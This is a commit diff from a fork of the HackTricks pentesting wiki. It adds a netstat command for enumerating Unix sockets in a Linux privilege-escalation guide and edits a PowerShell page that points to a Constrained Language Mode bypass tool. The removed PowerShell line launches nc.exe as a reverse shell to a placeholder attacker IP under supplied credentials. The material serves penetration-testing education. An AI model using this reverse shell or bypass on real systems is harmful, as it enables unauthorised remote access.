coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 2 pages modified

Browse Source
This commit is contained in:
CPol 2020-08-25 20:46:29 +00:00 committed by gitbook-bot
parent 177537e422
commit b4e619098f
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 7 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
linux-unix/privilege-escalation/README.md
View File

@ -432,6 +432,12 @@ _Note that the system must be using that socket file configuration or the backdo
If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability.
### Enumerate Unix Sockets
```bash
netstat -a -p --unix
```
### HTTP sockets
Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:

3
windows/basic-powershell-for-pentesters/README.md
View File

@ -97,7 +97,7 @@ $ExecutionContext.SessionState.LanguageMode
Powershell -version 2
```
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll_ and **change the project to .Net4.5**.
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
#### Direct bypass:
@ -226,7 +226,6 @@ Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{St
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
## Groups